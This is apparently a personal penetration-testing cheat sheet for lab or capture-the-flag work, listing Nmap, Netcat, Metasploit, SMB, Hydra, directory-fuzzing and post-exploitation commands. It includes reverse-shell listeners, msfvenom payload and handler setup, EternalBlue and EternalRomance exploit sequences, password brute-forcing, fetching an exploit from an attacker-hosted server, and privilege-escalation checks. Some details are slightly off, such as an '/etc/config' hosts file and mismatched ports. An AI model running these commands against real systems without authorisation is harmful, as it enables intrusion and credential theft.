Nmap, Netcat, and Metasploit Commands Cheat Sheet

Nmap Options

-PE: ICMP echo ping; quick check whether a host is up.

-sn: Disable port scanning (host discovery).

-n: Disable DNS resolution (scan by IP without looking up hostnames).

-O: OS detection.

-A: OS detection, Version detection, Script scanning, traceroute.

-sV: Service detection (banner info, version).

-v: Verbose output (-vv for even more detail).

-sC: Scan with default scripts for additional info gathering.

--min-rate=5000: Send at least 5000 packets per second.

nmap --script smb-enum-shares.nse -p 445 (ip): List SMB shares and their properties.


To list scripts whose names start with X: ls (nmap scripts directory)/X*

To run a script with script tracing: sudo nmap --script=smb-os-discovery --script-trace (target IP)

To enumerate SMB shares: sudo nmap --script=smb-enum-shares (target IP)

Vulnerability scanning on port 445 (quote the pattern so the shell does not expand it): sudo nmap --script="smb-vuln-*" -p 445 (target IP)


Netcat Commands

nc -z site.com (port range): Port scan of the specified host (-z connects without sending data).

nc -l (port): Listen on the specified port for incoming TCP connections (add -u for UDP).

nc site.com 1234 < file_name: Send a file to a listener on the specified port.

printf (HTTP response/HTML) | nc -l (port): Serve hand-written HTML through a local listener.

-u: UDP; -v: verbose; -p: specify port; -D: enable socket debugging; -n: skip DNS lookups.

nc -nv (ip) (port): Connect to a remote listener (remote shell approach).

nc -l -p (port) -e relay.bat: Listener that runs relay.bat for each connection (traditional netcat -e).

> filename.out: redirect output into a file; < filename.in: feed a file in as input.

echo "" | nc -zv -w1 (host) (port range): Grab the TCP banners for a range of ports (-w1 sets a 1 second timeout).

PHP Reverse Shell

For a reverse shell with PHP:

  1. Download a PHP reverse shell and place it in the share.
  2. Set up a listener: nc -lvp 4444.
  3. Request the uploaded PHP file through the web server (append the relevant path/query to the URL).

SSH, DNS, and File Transfer

SSH login: ssh (username)@(target IP)

DNS zone transfer: dig axfr (target domain) @(target IP)

scp (file) <userid>@<victim IP address>:/home/friend: Copy a file to the target machine, into the "friend" account's home directory.

chmod +x (file): Change the file permissions to make it executable.


SMB Client

(Use when Nmap reports SMB on the target):

Listing shares: smbclient -L (ip address)

Connecting to a share: smbclient //(ip)/(share) -U (username)

Enumerate SMB shares and info on a target Windows system: enum4linux -S (target IP)

Enumerate SMB shares and their permissions (null session): crackmapexec smb 10.129.250.241 -u '' -p '' --shares

RDP connection (xfreerdp client): xfreerdp /u:<userid> /p:<password> /v:<IP Address>


Password Cracking

John the Ripper: john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 (file)

Hydra: sudo hydra -l (username) -P /usr/share/wordlists/rockyou.txt (target IP) https-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials"

https-post-form: Specifies the target form for brute-forcing; the string after the last colon is the text that marks a failed login.


Directory Scanning

(The target hostname may have to be added to the /etc/config file first)

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[IP]/FUZZ

gobuster dir -u (target address) -x (extension) -w /usr/share/wordlists/dirb/common.txt -t 50

feroxbuster --url (target URL)


Hosting and Transferring Exploits

Hosting an HTTP server to bring exploits over: python3 -m http.server 8000

Bringing an exploit over to a shell (use the port the server was started on): curl http://10.10.14.15:8080/(exploit) -o C:\(path to desktop)


Metasploit

Creating Payload

msfvenom -p [PAYLOAD] lhost=[LHOST] lport=[LPORT] -f [FORMAT] -o [FILENAME].exe

Setting up Listener

msfconsole ; use exploit/multi/handler ; set payload (operating system)/(x64|x86)/meterpreter/reverse_tcp ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; run

Suggests potential local exploits from an existing session: use post/multi/recon/local_exploit_suggester

EternalRomance

(Requires an SMB user and password, unlike EternalBlue):

msfconsole ; search ms17_010 ; use 0 (windows/smb/ms17_010_psexec) ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; set SMBPass (Password) ; set SMBUser (Username) ; run ; getuid (expect NT AUTHORITY\SYSTEM)

EternalBlue

(Does not require SMB credentials, unlike EternalRomance)

msfconsole ; use windows/smb/ms17_010_eternalblue ; set RHOST (victim IP) ; set LPORT (lport number) ; set LHOST (listening IP/attacker) ; run

winPEAS enumeration (items highlighted in red are the most likely privilege-escalation vectors): https://github.com/peass-ng/PEASS-ng/releases/tag/20250202-a3a1123d


Post Exploitation

Full TTY Shell

Spawn a better interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

Restore terminal behaviour for full control (press Ctrl+Z first to background the shell, then on the local terminal): stty raw -echo; fg; then inside the shell: export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Search for SUID/SGID binaries, which may be exploitable for privilege escalation: find / -perm /6000 2>/dev/null

Evil-WinRM (connects to a Windows machine using Windows Remote Management; -S uses SSL): evil-winrm -S -i [IP] -u [username] -p [password]

CrackMapExec: Enumerating and attacking Windows networks

CrackMapExec: For enumerating and attacking Windows network


Database Enumeration

MySQL

mysql -u (username) -p ; show databases; use (database); show tables; select * from (table); show create table (table); (reveals the table schema)

MongoDB

db.getCollection('flag').find(): Retrieve all documents from the "flag" collection

db.getCollection('ecommerceWebapp').find({'id':2}): Query the "ecommerceWebapp" collection for a specific entry

db.ecommerceWebapp.getIndexes(): List the indexes on a collection


Security Checks

Steven Goh's book of hiding tricks (Windows):

View PowerShell history: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Common security checks: WSL installation, public user, guest user, SMB shares, FTP anonymous login

(Linux): Check home directories, webapp configs, SUID binaries, mail, Git repositories, and uncommon services and open ports

List the commands the user may run with sudo (potential privilege escalation; prompts for the password): sudo -l

Extract a password-protected archive: 7z x (filename) -p(Password)


Shell Commands

groups = See which groups the user is part of

cat = Print the contents of a file

pwd = Check the current path

docker images = List the local Docker images

docker run -it --privileged --rm peeps-web /bin/bash = Run a privileged container from an image (Docker privilege escalation path)

Miscellaneous

Base64 decoding: echo 'string' | base64 -d; echo; (base64 -d reads from a file or stdin, not from an argument)

View the ACL of a Windows directory (PowerShell): Get-Acl -Path C:/inetpub | Format-Table -Wrap